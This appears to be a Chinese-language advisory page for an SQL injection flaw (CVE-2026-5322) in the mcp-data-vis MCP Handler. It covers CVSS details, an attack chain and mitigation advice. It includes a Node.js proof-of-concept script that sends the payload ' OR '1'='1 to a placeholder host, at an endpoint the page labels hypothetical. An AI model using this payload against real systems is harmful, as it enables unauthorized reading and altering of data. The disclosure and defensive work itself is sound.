CVE-2026-5322 CVSS 7.3 高危

CVE-2026-5322 mcp-data-vis SQL注入漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5322

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AlejandroArciniegas mcp-data-vis

漏洞概述

在AlejandroArciniegas mcp-data-vis组件的MCP Handler中发现SQL注入漏洞。该漏洞位于src/servers/database/server.js文件的Request函数中。由于对用户输入处理不当，攻击者无需认证即可远程发起攻击，通过构造恶意SQL语句操纵数据库，可能导致数据泄露、篡改或服务拒绝。该产品采用滚动发布模式，具体受影响版本不详，且厂商尚未回应。

技术细节

该漏洞源于MCP Handler组件中`src/servers/database/server.js`文件的`Request`函数未对输入参数进行充分的过滤或转义，直接将其拼接到SQL查询语句中。根据CVSS向量分析，攻击可以通过网络（AV:N）发起，攻击复杂度低（AC:L），无需用户交互（UI:N）且无需权限（PR:N）。攻击者通过发送特制的HTTP请求，将恶意SQL代码注入到后端数据库查询中。这种注入可能导致敏感信息泄露（C:L）、数据完整性受损（I:L）以及服务可用性下降（A:L）。目前利用代码已公开，风险极高。

攻击链分析

STEP 1

步骤1

攻击者通过网络扫描发现运行 mcp-data-vis 的目标服务器，并识别出开放的 MCP Handler 服务端口。

STEP 2

步骤2

攻击者向 src/servers/database/server.js 中的 Request 接口发送特制的 HTTP POST 请求，请求中包含恶意构造的 SQL 注入载荷（如 ' OR '1'='1）。

STEP 3

步骤3

服务器端未对输入参数进行清洗，直接将恶意数据拼接到 SQL 查询语句中，导致数据库执行了非预期的 SQL 命令。

STEP 4

步骤4

数据库响应恶意查询，导致敏感数据被读取（机密性受损）、数据被非法修改（完整性受损）或数据库服务崩溃（可用性受损）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC Concept for CVE-2026-5322
// Target: src/servers/database/server.js Request function

const http = require('http');

// Malicious payload designed to trigger SQL Injection
// Assuming the endpoint takes a 'query' or 'id' parameter
const payload = JSON.stringify({
  "id": "1' OR '1'='1" // Basic SQL Injection payload
});

const options = {
  hostname: 'target-host',
  port: 3000,
  path: '/api/database/request', // Hypothetical vulnerable endpoint
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Content-Length': payload.length
  }
};

const req = http.request(options, (res) => {
  console.log(`Status: ${res.statusCode}`);
  res.on('data', (d) => {
    process.stdout.write(d);
  });
});

req.on('error', (error) => {
  console.error(error);
});

req.write(payload);
req.end();

影响范围

AlejandroArciniegas mcp-data-vis (提交 bc597e3 及 de5a515 之间的版本)

由于采用滚动发布模型，具体版本号无法确定，建议全面排查

防御指南

临时缓解措施

在厂商发布正式修复补丁之前，建议通过网络访问控制列表（ACL）限制对 mcp-data-vis 数据库服务接口的访问来源，仅允许可信的内网IP调用。同时，部署Web应用防火墙（WAF），配置规则拦截包含常见SQL注入特征（如单引号、UNION SELECT、注释符等）的流量，以降低被攻击的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5322
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5322
3 Details https://www.cvedetails.com/cve/CVE-2026-5322/
4 VulDB https://vuldb.com/cve/CVE-2026-5322
5 Link https://github.com/wing3e/public_exp/issues/19
6 Link https://vuldb.com/submit/780731
7 Link https://vuldb.com/vuln/354654
8 Link https://vuldb.com/vuln/354654/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表